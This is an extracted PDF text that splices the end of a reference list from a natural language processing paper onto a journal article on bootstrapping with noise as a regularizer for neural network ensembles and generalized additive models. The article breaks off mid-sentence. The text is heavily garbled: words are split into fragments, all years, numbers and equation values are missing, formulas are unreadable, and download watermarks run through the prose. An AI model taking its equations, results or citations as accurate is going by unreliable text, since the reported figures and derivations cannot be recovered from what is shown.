mohamed amir yosef, ilaria bordino, hagen fürstenau, manfred pinkal, marc spaniol, bilyana taneva, stefan thater, and gerhard weikum. . robust disambiguation of named entities in text. in proceedings of the conference on empirical methods in natural language processing. eduard hovy, mitchell marcus, martha palmer, lance ramshaw, and ralph weischedel. . ontonotes: the % solution. in proceedings of the north ameri- can chapter of the association for computational lin- guistics: short papers. heng ji and ralph grishman. . knowledge base population: successful approaches and challenges. in proceedings of the association for computational linguistics. jun’ichi kazama and kentaro torisawa. . exploit- ing wikipedia as external knowledge for named en- tity recognition. in proceedings of the joint confer- ence on empirical methods in natural language pro- cessing and computational natural language learn- ing. terry koo, xavier carreras, and michael collins. . simple semi-supervised dependency parsing. in pro- ceedings of the association for computational lin- guistics. john d. lafferty, andrew mccallum, and fernando c. n. pereira. . conditional random fields: proba- bilistic models for segmenting and labeling sequence data. in proceedings of the international conference on machine learning. heeyoung lee, yves peirsman, angel chang, nathanael chambers, mihai surdeanu, and dan jurafsky. . stanford’s multi-pass sieve coreference resolution system at the conll- shared task. in proceed- ings of the conference on computational natural lan- guage learning: shared task. qi li and heng ji. . incremental joint extraction of entity mentions and relations. in proceedings of the association for computational linguistics. xiaoqiang luo. . on coreference resolution per- formance metrics. in proceedings of the conference on empirical methods in natural language process- ing. david milne and ian h. witten. . learning to link with wikipedia. in proceedings of the conference on information and knowledge management. vincent ng. . supervised noun phrase coreference research: the first fifteen years. in proceedings of the association for computational linguistics. nist. . the ace evaluation plan. in nist. joel nothman, nicky ringland, will radford, tara mur- phy, and james r. curran. . learning multilin- gual named entity recognition from wikipedia. arti- ficial intelligence, : – , january. alexandre passos, vineet kumar, and andrew mccal- lum. . lexicon infused phrase embeddings for named entity resolution. in proceedings of the con- ference on computational natural language learn- ing. slav petrov, leon barrett, romain thibaux, and dan klein. . learning accurate, compact, and inter- pretable tree annotation. in proceedings of the con- ference on computational linguistics and the associ- ation for computational linguistics. simone paolo ponzetto and michael strube. . exploiting semantic role labeling, wordnet and wikipedia for coreference resolution. in proceed- ings of the north american chapter of the association of computational linguistics. sameer pradhan, lance ramshaw, mitchell marcus, martha palmer, ralph weischedel, and nianwen xue. . conll- shared task: modeling unre- stricted coreference in ontonotes. in proceedings of the conference on computational natural language learning: shared task. sameer pradhan, alessandro moschitti, nianwen xue, olga uryupina, and yuchen zhang. . conll- shared task: modeling multilingual unre- stricted coreference in ontonotes. in joint confer- ence on emnlp and conll - shared task. sameer pradhan, xiaoqiang luo, marta recasens, ed- uard hovy, vincent ng, and michael strube. . scoring coreference partitions of predicted mentions: a reference implementation. in proceedings of the association for computational linguistics. karthik raghunathan, heeyoung lee, sudarshan ran- garajan, nathanael chambers, mihai surdeanu, dan jurafsky, and christopher manning. . a multi- pass sieve for coreference resolution. in proceed- ings of the conference on empirical methods in natu- ral language processing. altaf rahman and vincent ng. . coreference res- olution with world knowledge. in proceedings of the association for computational linguistics: hu- man language technologies. lev ratinov and dan roth. . design challenges and misconceptions in named entity recognition. in proceedings of the conference on computational nat- ural language learning. lev ratinov and dan roth. . learning-based multi-sieve co-reference resolution with knowledge. in proceedings of the joint conference on empirical methods in natural language processing and com- putational natural language learning. lev ratinov, dan roth, doug downey, and mike ander- son. . local and global algorithms for disam- biguation to wikipedia. in proceedings of the associ- ation for computational linguistics. avirup sil and alexander yates. . re-ranking for joint named-entity recognition and linking. in pro- ceedings of the international conference on informa- tion and knowledge management. sameer singh, sebastian riedel, brian martin, jiaping zheng, and andrew mccallum. . joint inference of entities, relations, and coreference. in proceed- ings of the workshop on automated knowledge base construction. david a. smith and jason eisner. . dependency parsing by belief propagation. in proceedings of the conference on empirical methods in natural lan- guage processing. wee meng soon, hwee tou ng, and daniel chung yong lim. . a machine learning approach to coref- erence resolution of noun phrases. computational linguistics, ( ): – , december. veselin stoyanov, nathan gilbert, claire cardie, and ellen riloff. . conundrums in noun phrase coreference resolution: making sense of the state- of-the-art. in proceedings of the association for com- putational linguistics. veselin stoyanov, claire cardie, nathan gilbert, ellen riloff, david buttler, and david hysom. . coref- erence resolution with reconcile. in proceedings of the association for computational linguistics: short papers. marc vilain, john burger, john aberdeen, dennis con- nolly, and lynette hirschman. . a model- theoretic coreference scoring scheme. in proceed- ings of the conference on message understanding. kellie webster and james r. curran. . limited memory incremental coreference resolution. in pro- ceedings of the conference on computational linguis- tics. tong zhang and david johnson. . a robust risk minimization based named entity recognition sys- tem. in proceedings of the conference on natural language learning. jiaping zheng, luke vilnis, sameer singh, jinho d. choi, and andrew mccallum. . dynamic knowledge-base alignment for coreference resolu- tion. in proceedings of the conference on computa- tional natural language learning. bootstrapping with noise: an effective regularization technique this article was downloaded by: [ ] on: september , at: : publisher: taylor & francis informa ltd registered in england and wales registered number: registered office: mortimer house, - mortimer street, london w t jh, uk connection science publication details, including instructions for authors and subscription information: http://www.tandfonline.com/loi/ccos bootstrapping with noise: an effective regularization technique yuval raviv a & nathan intrator a a school of mathematical sciences, sackler faculty of exact sciences, tel-aviv university, ramat aviv, , israel available online: jul to cite this article: yuval raviv & nathan intrator ( ): bootstrapping with noise: an effective regularization technique, connection science, : - , - to link to this article: http://dx.doi.org/ . / please scroll down for article full terms and conditions of use: http://www.tandfonline.com/page/ terms-and-conditions this article may be used for research, teaching and private study purposes. any substantial or systematic reproduction, re-distribution, re-selling, loan, sub-licensing, systematic supply or distribution in any form to anyone is expressly forbidden. the publisher does not give any warranty express or implied or make any representation that the contents will be complete or accurate or up to date. the accuracy of any instructions, formulae and drug doses should be independently verified with primary sources. the publisher shall not be liable for any loss, actions, claims, proceedings, demand or costs or damages whatsoever or howsoever caused http://www.tandfonline.com/loi/ccos http://dx.doi.org/ . / http://www.tandfonline.com/page/terms-and-conditions http://www.tandfonline.com/page/terms-and-conditions arising directly or indirectly in connection with or arising out of the use of this material. d ow nl oa de d by [ ] a t : s ep te m be r c onnection scien ce, v ol. , n os & , , ± b ootstrapping with n oise: a n e ffective r egu larization t echniqu e y u v a l r a viv & n at h a n in t ra t or bootstrap sam ples w ith n oise are shown to be an effective sm ooth ness and capacity control technique for tra ining feedforward network s and for other statistical m ethods such as genera lized additive m odels. it is shown that noisy bootstrap perform s best in conjunc tion w ith w eight-decay regula riz ation and ensemble averaging. t he tw o-sp iral problem , a highly non-lin ear, noise-free data, is used to dem onstra te these ® ndings. t he com bination of noisy bootstrap and ensemble averaging is also show n useful for generalized additive m odelling, and is also dem onstra ted on the w ell-k now n c leveland heart data. k eyw ords : n oise injection, com b ining estim ators, pattern classi® cation, two-spira l prob lem , clinical data analysis. . intro du ction t he boo tstrap technique h as b ecom e one of the majo r tools for prod ucing em pirical con® dence intervals of estimated param eters or predictors (efro n & t ibshira ni, ). one way to view b ootstrap is as a m ethod to sim ulate noise inherent in the data, and thus increase effec tively the num ber of training patterns. a sim p le b ootstrap p rocedure am ounts to sam p ling with return fro m the training data, and constructing several training sets, all with the sam e size as the original training set. later, the variab ility betw een the estim ated param eters can b e m easu red, and give som e indication abo ut the true variab ility of the m odel param eters arisin g from the data. furthermore, variabi lity of the p rediction, or error bars on the prediction, can also be estim ated in this way. o ne varian t of b ootstrap involve s estim ation of a m odel of the form y f(x) « fo r som e p aram etric fam ily to which f belongs, and a noise « wh ich is assu m ed to be sm all with zero m ean. o nce an em pirical fu nction fà h as been estim ated fro m n training sam ples, there rem ains a noise vector « ( « , ¼ , « n). o ne can then sam p le from the em pirical distribu tion of the noise b y sam pling (w ith return) from « i and constructing new sam ples of the form (x * i , y * i ), in which « i was replac ed by « *i sam pled from the abo ve set. clearly, this app roach can b e easily extended to a y. raviv and n . intrator, school of m athematical sciences, sackler faculty of e xact sciences, tel-aviv u niversity, ram at aviv , israel. e-mail: {yuv,nin}@ math.tau.ac.il. present address of n . in trator, institute of brain and n eural system s, box , brown u niversity, providence, ri , u sa. ± / / ± $ . Ó journals oxford ltd d ow nl oa de d by [ ] a t : s ep te m be r y. r aviv & n . intrator sm oothed bo otstrap (e fron & t ibshirani, ) by sam p ing fro m the em p irical distrib ution by « i rather than just sam pling from the set of « i’ s. in such case, one can increase the size of each bo ostrap set, sin ce due to the noise, the differen t sets are su f® ciently independent. it sh ould b e noted that if fà is b iase d, the noise vector m ay be over-estim ated. f or classi® cation p roblems, the form y f(x « ) m ay b e more ap pro priate. in this case, using noise injection to the inputs during training can im prove the generalization p roperties of the estim ator (sietsm a & d ow, ). r ecently, b ish op ( ) has sh own that training w ith sm all am ounts of noise is locally equivalent to sm oothness regularization. in this paper, we give a diffe rent interpretation to noise added to the input during training, and view it as a regularizing param eter that controls, in conju nction w ith ensem b le averaging, the cap acity and the sm oothness of the estim ator. t he m ajo r role of this noise is to push diffe rent estimators to diffe rent local m inim a, and so prod uce a m ore independent set of estim ators. b est perform ance is then achieved by ave raging over the estim ators. for this regularization, the level of the noise m ay b e larger than the `true’ level wh ich can b e indirectly estim ated. since we want to study the effec t of bo otstrappin g with noise on the sm oothness of the estim ator, separated from the task of inp ut noise estim ation, w e consider a highly non-lin ear, noise-fre e classi® cation prob lem , and sho w that even in this extreme case, addition of noise during training im proves results signi® cantly. w e cho se a p roblem that is very dif® cult fo r fe edfo rw ard neural networks (n n s). it is dif® cult due to the h ighly non-lin ear nature of the decision bo undaries, and the fac t that these non-lin earities are easier to represent in local radially sym m etric fu nctions rath er than in ridge fu nctions such as those given by fe edforw ard sigm oidal fu nctions. since the training data are given w ith no noise, it seems unreasonable to train a netw ork with noise, but we sho w that even in this case training with noise is a very effective app roach fo r sm oothing the estim ator. in addition to dem onstrating our m ethod on a diffe rent class of predictorsÐ the generalized additive m odelsÐ we also app ly it to another well-kn own data setÐ the c leveland heart data (d etrano et al., ). . t heoretical c onsideratio ns t here are a num ber of factors that have to be app lied carefully w hen trying to regularize an estim ator. t he regularization is aim ed at ® nding an op tim al trade-off between the varian ce and b ias of the estim ator (g em an et al., ), and fo r best perfo rm ance one has to utilize this decom po sition of the error fu nction. th e m otivation to our ap pro ach follow s from a key ob servatio n regarding the b ias variance decom positio n, nam ely the fact that ensem b le ave raging does not affe ct the bias p ortion of the error, b ut reduces the varian ce w hen the estim ators on wh ich averaging is done are independent. . . bias/v ariance t rade-off for en semble of p redictors t he classi® cation pro blem is to estim ate a fu nction f x (x) of observed data charac teristics x, predicting class labe l y, b ased on a given training set x {(x , y )}, . . . , (x l, y l)} using som e m easure of the estim ation error on x . d ow nl oa de d by [ ] a t : s ep te m be r bootstrapping w ith n oise a good estim ator w ill perfo rm well not only on the training set, but also on new valid ation sets wh ich were not used during estim ation. evalu ation of the perfo rm ance of the estim ator is com m only done via the m ean squ ared error (m se) distance b y taking the expectation with respect to the (unknown) p robability distribu tion p of y: e[(y f x (x)) u x, x ] t his can be decom p osed into e[(y f x (x)) u x, x ] e[(y u x]) u x, x ] e[(f x (x) e [y u x]) ] t he ® rst term does not depend on the training data x or on the estim ator f x (x); it m easu res the am ount of noise or variab ility of y given x. h ence, f can b e evaluated using e[(f x (x) e[y u ]) ] t he em pirical m se of f is given by e x [(f x (x) e[y u x]) ] wh ere e x represents expectation with resp ect to all possib le training sets x of ® xed size. t o see fu rther the perfo rm ance under m se, we decom po se the error to b ias and varian ce com po nents to get e x [(f x (x) e[y u x) ] (e x [f x (x)] e[y u x]) e x [(f x (x) e x [fd (x)]) ] ( ) t he ® rst term on the right-han d sid e is called the b ias of the estim ator and the second term is called the variance. w hen training on a ® xed training set x , reducing the bias with resp ect to this set m ay increase the variance of the estimator and contribute to po or generalization perform ance. t his is known as the trade-off between variance and bias. t ypic ally, varian ce is reduced by sm oothing; how ever, this m ay introduce bias (since, fo r exam ple, it m ay blur sharp peaks). b ias is reduced by prio r know ledge. w hen prio r know ledge is used also fo r sm oothing, it is likely to reduce the overall m se of the estim ator. w hen training n n s, the varian ce arise s from tw o term s. t he ® rst term com es from inherent data ran dom ness and the second term com es fro m the non- identi® ability of the m odel, nam ely, the fac t that for a given training data, there m ay be several (local) m inim a of the error su rface. c onsid er the ensem ble ave rage fÅ of several predictors, e.g. n n s with diffe rent random initial w eights which are trained on data with added g aussian noise: fÅ (x ) n o n i f i (x ) t hese predictors are identically distributed and, thus, the varian ce contribution (equation ( )) becom es (we om it x and x for clarity) e [( fÅ e [ fÅ ]) ] e f s n o f i e f n o f i g d g e f s n o f i d g s e f n o f i g d e f n o f i e f n o f i g g d ow nl oa de d by [ ] a t : s ep te m be r y. r aviv & n . intrator e f s n o f i d g s e f n o f i g d ( ) t he ® rst term on the righ t-h and sid e can be rewritten as e f s n o f i d g n o e [ f i ] n o i , j e [ f i f j ] and the second term gives s e f n o f i g d n o e [ f i ] n oi , j e [ f i ]e [ f j ] plugging these equalities in equation ( ) gives e [( fÅ e [ fÅ ]) ] n o {e [ f i ] (e [ f i ]) } n oi , j {e [ f i f j ] e [ f i ]e [ f j ]} ( ) if the predictors { f i } are highly correlated, fo r exam p le if f i f j f fo r all i , j , then the abo ve equation becom es var ( fÅ ) n v ar ( f ) n n ( n ) v ar ( f ) var ( f ) nam ely, there is no reduction in varian ce in this case. if the predictors are identically distrib uted and independent, then the second term drop s and we are left with var ( fÅ ) n v ar ( f i ) n ote that e [ f i f j ] e [ f i ]e [ f j ] e ({ f i e [ f i ]}{ f j e [ f j ]}) t hus, the notion of independence can be understood as independence of the deviations of each predictor from the expected valu es of the p redictor, which can be replaced (due to linearity) by e ({ f i e [ fÅ ]}{ f j e [ fÅ ]}) and is thus interpreted as an independence of the prediction variation aro und a com m on m ean. t he success of ensem ble averag ing of n n s in the past (b reim an, ; h ansen & salam on, ; p errone, ; w olp ert, ) is due to the fact that n n s have in general m any local m inim a, and thus even with the sam e training set, diffe rent local m inim a are fo und when starting from diffe rent ran dom initial conditions. t hese diffe rent local m inima lead to so m ewh at independent predictors, and thus the averaging can reduce the varian ce. w hen a larger set of independent networks is needed, but no m ore data are availab le, data reuse m ethods can help. bootstrap- ping (breim an, ) has been very helpfu l, since by resam p ling (with return) from the training data, the independence of the training sets is increased, and hence, the independence of the estim ators, leading to im prove d ensem ble results. sm oothed bo otstrap (k rogh & h ertz, ; r ipley, ) is potentially m ore usefu l sin ce larger sets of independent training sam ples can be generated. th e sm oothed bo otstrap approa ch am ounts to generating larger data sets by sim ulating the true noise in the data. d ow nl oa de d by [ ] a t : s ep te m be r bootstrapping w ith n oise . t he b ootstra p e nsem ble w ith n oise a lgorithm in the boo tstrap ensem ble with noise (b en ), w e p ush the idea of noise injection fu rther; we observe that adding noise to the inputs increases the ® rst term on the right-han d sid e of equation ( ), i.e. adds varian ce to each estim ator, but, on the other han d, decreases the contribution of the second term on the right-han d sid e as it increases the independence between estim ators. instead of usin g the `true’ noise (estim ated from the data) for b ootstrap, we seek an optim al noise level which gives the sm allest contribution to the error fro m the sum of the two com po nents of the varian ce. it is im po ssible to calculate the optimal varian ce of the g aussian noise without k nowing f explicitly; therefore, the value of this varian ce rem ains a regularization term : a param eter which has to be estim ated so as to m inim ize the total contribution of the varian ce to the error. furtherm ore, sin ce the injection of noise increase s the independence betw een diffe rent training sets, we can use bo otstrap sets that are larger than the original training set. th is does not affe ct the bias (if the noise is sym m etric arou nd zero) but can reduce the varian ce. n ote that the bias contribution to the error is not affe cted by introducing the ensem ble- averag e estim ator due to linearity of expectations. it fo llows that the ben approa ch has the po tential of reducing the contribution of the varian ce term to the total erro r. w e thus sho uld seek a differen t trade-off po int b etween the contribution of the varian ce and the b ias. in other words, we are able to use large (unbiased ) networks w ithout being affe cted by the large varian ce assoc iated w ith su ch networks. t his obse rvatio n im plies that the estim ation of optim al noise levels shou ld not be based on a single estim ator perform ance, b ut rath er base d on the ensem ble perfo rm ance. th e large varian ce of each sin gle network in the ensem ble can be tem pered w ith a regularization such as w eight decay (k rogh & h ertz, ; r ipley, ), but, again, the estim ation of the optim al regularization factor sho uld be done on the ensem ble-averaged perfo rm - ance. breiman ( ) and r ipley ( ) sho w com pelling em pirical evidence fo r the im po rtance of weight decay as a single network stab ilizer. our resu lts con® rm this fact under the ben m odel. t he ben algorithm · let {( x i , y i )} be a set of training p atterns for i , . . . , n . · let « { « , . . . , « j }. · let l { l , . . . , l i }. · f or a noise level « j estim ate an op tim al penalty term fo r weight decay l i : Ð fix a size k fo r the bo otstrap sam ple, su ch that k @ n (we used k n ). Ð let s , s , . . . , s k b e a set of indices, chosen fro m a unifo rm distribution, s i , u ( , n ). Ð for a « j , create a noisy b ootstrap resam p le of the training set inputs: { x s i z i }i ,...,k and the corresp onding resam pled outputs { y s i }i ,...,k wh ere z i is a vector who se com po nents are n ( , « j ). Ð train several networks with the noisy sam ples using weight decay l , . . . , l i . Ð g enerate an ensem ble averag e of the set of netw orks. Ð ch oose via cross-v alidation or a test set, the op tim al weight decay l . · r epeat the process for the new choice of noise « j until there is no im pro vem ent in prediction. in the sim ple case, the sam e noise level is used for each dim ension. t his is su itable d ow nl oa de d by [ ] a t : s ep te m be r y. r aviv & n . intrator f igure . th e two-spira ls training data (left). t raining points with noiseÐ standard deviation, sd . (right). a s can b e seen, the noise level that contam inates the data causes objects to cross the virtual bo undary de® ned b y the data, i.e. the noise leads to wrong class lab elling for the training data. th is reduces perfo rm ance of sin gle predictors, but the added independence b etween the predictors leads to im proved ensem ble perform ance. fo r problem s in wh ich each of the dim ensions are on the sam e scale, or, m ore precisely, wh en the noise distribu tion is sim ilar in differen t data dim ensions. w hen all covariates have the sam e interpretation, e.g. sim ilar m easu rem ents taken at differen t tim e steps, or w hen dealing with pixel data, su ch noise assu m ption is adequate; ho wever, wh en the noise is non-h om ogeneous in spac e, has a non- diagonal covariance m atrix or wh en differen t dim ensions represent com pletely differen t m easurem ents, it is best to estim ate the diffe rent noise levels in each dim ension sep arately. w hen this is too costly, or there is insu f® cient data fo r robu st estim ation, a quick solution is to sph ere the data by setting the varian ce in each dim ensio n to b e the sam e and with zero m ean. . . t he t w o-sp irals prob lem t he `tw o-spira ls’ p roblem consists of a training set with x ± y valu es, h alf of wh ich are to prod uce a output and half a output. t hese training p osts are arran ged in tw o interlocking sp irals that go aro und the origin three tim es, as sh own in f igure . t he problem was p ropo sed to the c m u benchm ark by a lexis w ieland of m itr e corpo ration (see a ppe ndix a for a description of the problem ). it ap pears to be extrem ely hard fo r bac kpropo gation networks due to its h igh non-lin earity. it is easy to see that the two-d im ensional po ints of the spirals could not b e separated by a sm all com bination of linear separators. lang and w itbrock ( ) prop osed a ± ± ± ± network with sh ort-cuts usin g weights. t hey used a variant of the q uick-p rop learn ing algorithm (fahlm an, ) with weight decay. t hey claim ed that the prob lem could not be solve d with sim pler architecture (i.e. less laye rs or without sho rt-cuts). t heir result on the sam e data set seem s to give po or generalization results. baum and lang ( ) dem onstrated that there are m any sets of weights that would cause a ± ± network to be consistent with the training set; ho wever, the sin gle-layer feedfo rw ard architecture trained with error bac kprop agation was unable to ® nd any of them when starting w ith ran dom initial weights. d ow nl oa de d by [ ] a t : s ep te m be r bootstrapping w ith n oise f ahlm an and lebiere ( ) used the cascade-correlation architecture for this prob lem . t hey got b etter resu lts, b ut still little `spiraln ess’ . recently, d effu ant ( ) su ggested the `perceptron m em b ran e’ m ethod that uses piecewise linear surfaces as discrim inators, and applied it to the sp iral prob lem . h e used perceptrons b ut had dif® culties cap turing the structure of the spirals due to the piecewise linearity of his decision bo undaries. t he two-spiral problem w as cho sen for this study because it is a hard prob lem fo r bac kpropagation netw orks due to h igh non-linearity, it is a noise-free problem , and the generalization perform ance of diffe rent predictors can be easily visualized on the two-d im ensional plan e. in section , we dem onstrate our m ethod on another well-know n m ach ine- learn ing problem , the prediction of coronary artery disease b ased on the cleveland heart data, wh ich reside in the u niversity of c alifo rnia at irvine (u ci) m ach ine- learn ing repository (m urphy & a ha, ). . r esults on the s piral d a ta . . feedforward n etwork architecture w e used riple y’ s ( ) s-p lus n n et pac kage, wh ich im plem ents bac kpropaga- tion. t he m inim ization criterion is m se with w eight-d ecay regularization of the fo rm e o p u t p y p u l o i, j w i, j wh ere t p is the target and y p the output fo r the p th exam p le pattern. w i , j are the weights and l is a param eter that controls the am ount of w eight decay regulariza- tion. t he network architecture w as ± ± (two inp uts, hidden units and one output). t he ® rst and last laye rs were fu lly connected to the hidden laye r giving a total of weights. th e transfe r fu nction of the hidden and output units was the logistic sigm oidal fu nction. th e initial weights were ran dom from u ( . , . ). it shou ld be noted here that alth ough w e are training ± networks, the effe ctive num ber of param eters is not m ore (and probab ly even less) than the num ber of param eters fo r a sin gle network. t his is because we do not have the ¯ exibility to estim ate an optim al com bination of predictors, but rather take the sim ple averag e of them. b ase line results were obtained by training network s without any regulariza- tion. w e derived then an averag e p redictor wh ose output is the mean of all the nets’ outputs (f igure (top left)). t he p redictor h ad no sm oothness constrain ts and therefore fou nd relatively linear bo undaries (this can also be seen in figure (top left), where a ® ve-n et ensem ble averag e is taken). . . . e ffect of tra ining with noise on a ¯ exible predictor. w e trained hidden-unit networks using the b ootstrap m ethod (as describ ed in section ), with noise sd ranging from « to « . , and k n . f igure dem onstrates the effec t of noise on the p redictor. each im age is a thresho ld output of a ® ve-net ensem ble averag e predictor. n oise level goes fro m « in the upp er left im age through « . in the lower right. th e classi® cation results are draw n on a uniform grid of p oints (nam ely, a m uch larger test set) so as to get a clear view of the d ow nl oa de d by [ ] a t : s ep te m be r y. r aviv & n . intrator f igure . sum m ary of -n et ensemb le resu lts. t op left: n o constrain ts ( no w eight decay or noise). top righ t: op tim al weight decay ( l e ) and no noise. bottom left: o ptim al noise (g aussian sd . ) and zero w eight decay. bottom right: o ptim al noise and optim al weight decay. t he classi® cation threshold in this ® gure and the fo llowing ones is . . classi® cation bo undaries de® ned by the classi® er. it can be seen that for sm all noise levels « , the ensemb le ave rage predictor is unable to ® nd any sm ooth structure in the data and m erely over-® ts to the training data. f or m oderate levels of noise, a better structure can be fo und, and for large levels of the noise, the data are so corrup ted that again no structure can b e fou nd. t he optim al noise sd was arou nd « . . . . . e ffect of weight-d ecay regula riz ation. w eight-d ecay regularization involve s ® nding an optim al param eter l that controls the am ount of w eight decay versu s the bias of the net. w e trained networks with differen t l ’ s and fou nd that optim al valu es were aro und l e . w h en com paring the effe ct of ave raging alone with the effe ct of regularization via weight decay with no averaging, it turns out that the bo otstrap m ethod (averaged over differen t initial network w eights) h as better generalization p roperties than the weight-d ecay m ethod. the w eight-d ecay regu- larization does not generaliz e well on the outer points, w here the training data are m ore sparse . . . . a pplyin g bootstrap to netw orks with weight decay. o ur best results w ere obtained when app lying the b en m ethod to netw orks with optim al weight-decay regularization. figure demonstrates the effe ct of bo otstrap with noise on the perfo rm ance of a ® ve-n et ensem ble trained with optim al weight decay. the effe ct of ensem ble averaging over network s that were trained with diffe rent ran dom initial conditions only is dem onstrated in the top left im age w hich represents no d ow nl oa de d by [ ] a t : s ep te m be r bootstrapping w ith n oise f igure . effe ct of training with diffe rent levels of g aussian noise. ensem bles of ® ve networks with no w eight decay and a varyin g degree of noise (top left is zero noise, bottom right is noise with sd . ). noise during training. o ptim al noise valu es are sim ilar to those obtained w hen training with no weight decay, and are su rp risin gly high (see figure (right) fo r the corrup tion of noise to the data). a lthough the results look better than those with no weight decay, in the sense that the bo undaries look sm oother, they can still be im p roved by ave raging on a larger ensem ble of network s. t his is dem onstrated in the next section (figure ). t he effec t of averag ing is su mm arized in figure . it can be seen that the -n et ensem b le ave raging resu lts, with no weight decay and no noise are better than the correspo nding ones wh en an ensemb le of ® ve nets is used (figure ). sim ilarly, the results for an ensem ble of netw orks trained w ith optimal w eight decay with no noise are better than the corresponding ® ve-n et ensem ble (figure (top left)). finally, the com bination of weight decay, noise and -n et ensem ble clearly gives the best resu lts (f igure (bottom right)). t hus, while earlier work suggested that a single-laye r feedfo rw ard network is not capable of capturing the structure in the spiral data, it is evident that a netw ork ensem ble with strong control over its capacity (via weight decay) wh ich is trained with h eavy noise can discover the h ighly non-linear structure of the p roblem. d ow nl oa de d by [ ] a t : s ep te m be r y. r aviv & n . intrator f igure . effe ct of training with diffe rent noise levels on ® ve-n et ensem b le networks with w eight decay. n oise levels are as before, ± . from top left to bo ttom right. . . g eneralized additive m odels in this section, w e take a diffe rent ap pro ach . instead of analyzin g a method that has a hard tim e with the spiral data, we study a m odel that is very natural for it. w e apply b ootstrap ping to a generalized additive m odel (ga m ) (h astie & t ibshira ni, , ) with a polyn om ial ® t of degree on the sam e data. w e had to op tim ize the degree of the p olynomial and the span degree, which determ ines the sm oothness and the degree of locality of the estim ation. d ue to these ef® cient controls, this ¯ exib le m odel is m uch more appro priate for the spiral data. f urtherm ore, this algorithm provides a unique m odel, i.e. fo r each set of param eters, there is no variab ility in the pro duced m odels as opp osed to the variab ility generated b y the random initial weights of a feedfo rw ard network. a ll of this su ggests that there sh ould b e no reason to bo otstrap with noise, sin ce the sm oothness and locality already can control the sm oothness of the boundary surface, and there seem s no reaso n to corrupt the data with unfam iliar noise. m oreover, there is no need to ave rage over several m odels sin ce there is no variab ility due to diffe rent local m inim a of the resu lting m odel. it is thus su rprisin g that even in this extreme case, boo tstrap ping w ith noise im p roved the generalization results. figure depicts the results fo r variou s degrees of noise added during training. it is clear that the b ootstrap im pro ves resu lts, and, fu rtherm ore, sm all valu es of the noise sharp en the resu lt. d ow nl oa de d by [ ] a t : s ep te m be r bootstrapping w ith n oise f igure . m odel estimation usin g g am with b ootstrap. t en g a m p redictors are averag ed using boo tstrap sam p les with varying degree of noise. t here is no noise (and thus no averaging) at the top left resu lt. . c le velan d h eart d ata in this section, we analyze the cleveland heart data ( d etrano et al., ), donated by d r r ob ert d etrano to the u c i m ach ine-learning repository (m urphy & ah a, ). th is data concerns diagnosis of coronary artery disease and has been used in the past b y statisticians and by the m achine-le arn ing com m unity (b razdil & h enery, ; d etrano et al., ; g ennari et al., ; stensm o, ). f urther data and pre-proc essin g details are given in ap pendix b. th e pre-processin g, which included rem oval of m issing valu es, sphe ring the data and creating dumm y variab les to replac e categorial variab les, resu lted in a dram atic im p rovem ent over p ast resu lts. m oreover, it revealed that in the new data representation, the structure is very linear since logistic regressio n was ab le to obtain a nine-fo ld cross-valid ation error of abou t . % . a sim ilar error was obtained by usin g extensive pre-p rocessing and tem po ral-diffe rence reinforcem ent learn ing (stensm o, ). both resu lts are consistent w ith our fe edfow ard arch i- tecture results with no noise injection and are (as far as we know) the current best results on this data. it is thus a very challenging problem to n n s as deviation fro m linear structure is very sm all, and highly non-lin ear estim ators su ch as c ar t , radial-basis fu nctions and k n n did not do so well on this data (b razdil & h enery, ). th e prob lem is com plem entary to the spiral p roblem that w as consid ered before; there, we attem p ted to imp rove perform ance on a highly non-linear data which required a large cap acity network , while h ere we try to im prove p erform ance on a relatively linear pro blem using a sm all capacity network. in bo th cases, we sho w that noise cannot b e replac ed by network size or w eight-d ecay regularization and is essen tial fo r good perfo rm ance. d ow nl oa de d by [ ] a t : s ep te m be r y. r aviv & n . intrator f igure . r esults from logistic regressio n and fro m fe edforw ard networks w ith three hidden units and varyin g degrees of w eight decay. left: per cent classi® cation error. r igh t: r o c valu es. a ll results were obtained with nine-fold cross-v alidation on the c leveland heart data. in both graph s, the ® rst b oxplo t from the left represents the generalized linear m odel resu lts. f igure su m m arizes m odel com p arison of resu lts b etween logistic regression and nine-fold cross-v alidation, with three hidden-u nit networks based on riple y’ s n n et pac kage described in section . . train ing was stop ped after epochs or earlier, base d on r ipley’ s conditions. t he network results w ere obtained by training ® ve networks on each of the nine-fo ld cross-valid ation sets and averaging their results. t hus, each classi® cation error is generated out of networks. in each of the follow ing ® gures, the statistics were obtained from ± sim ilar runs differin g in ran dom initial conditions and cho ice of cross-valid ation sets fro m the data. th e cross-valid ation code is base d on the p ublic dom ain version of t ibsh i- rani in statlib. th e resu lts are su m m ariz ed by b oxplo ts (h oaglin et al., ). each bo xplo t is base d on ± sin gle network runs. a s the ratio betw een the two classes is differen t than one, classi® cation resu lts are not a very robu st m easure fo r m odel com pariso n, sin ce they are b ased on a single classi® cation thresh old. for exam ple, if one class represents only % of the data, then setting up the thresh old to will result in a trivial classi® er that w ill prod uce zero regard less of the inp ut and w ill have only % error. t he receiver-ope rating characteristic (r oc ) (good- enough et al., ; h anley & m cn eil, ) is freq uently used in su ch m odel com pariso ns, especially in clinical data (h enderson, ). this m easure has been used b y the contributor of the data (d etrano, ) and in assessing neural network perfo rm ance on other heart disease data (lipp m ann et al., ). f igure im plies that the p erform ance of n n s (w ithout noise injection) as m easu red by error rate and r o c valu es are slightly worse (not statistically signi® cant) comp ared with logistic regression , and cannot be im prove d by weight- decay regularization alone. f igure sho ws the effect of noise injection fo r vario us levels of weight decay fo r an over-c ap acity arch itecture of nine hidden units. n oise levels in all the fo llowing graph s represent the sd of the zero-m ean g aussian noise. a lthough noise injection p roduces signi® cant im pro vem ent, the ab so lute valu es are su b- optim al sin ce the arch itecture is too large. n ote, how ever, that the r o c valu es fo r the . weight decay net are the highest comp ared with logistic regression d ow nl oa de d by [ ] a t : s ep te m be r bootstrapping w ith n oise f ig u r e . in te g ra te d b ia s, v a ri a n c e a n d to ta l e rr o r fo r th e h e p a to m a d a ta se t. d ow nl oa de d by [ ] a t : s ep te m be r y. r aviv & n . intrator f igure . the effe ct of noise injection is dim inished wh en no w eight decay is used (com pare with figure ). a n op tim al architecture of three hidden units cannot prod uce good results w ithout weight decay. left: classi® cation error. r igh t: r o c valu es. (g lm r oc . . , n n et ro c . . ; t . , degrees of fre edom (df) , p , . ; z . , p , . ) or with the optim al three hidden-unit network. w e have been usin g bo th the t-statistic (h ogg & c raig, ) and the z-statistic of the w ilcoxon test (lehm ann, ) wh ich uses a non-p aram etric ran k to test the differen ce in the m edians, as it is m ore rob ust to outliers. the r oc results suggest that the classi® cation error of this m odel could be im proved, po ssibly by averag ing over a larger num ber of network s. to see the perfo rm ance of noise injection alo 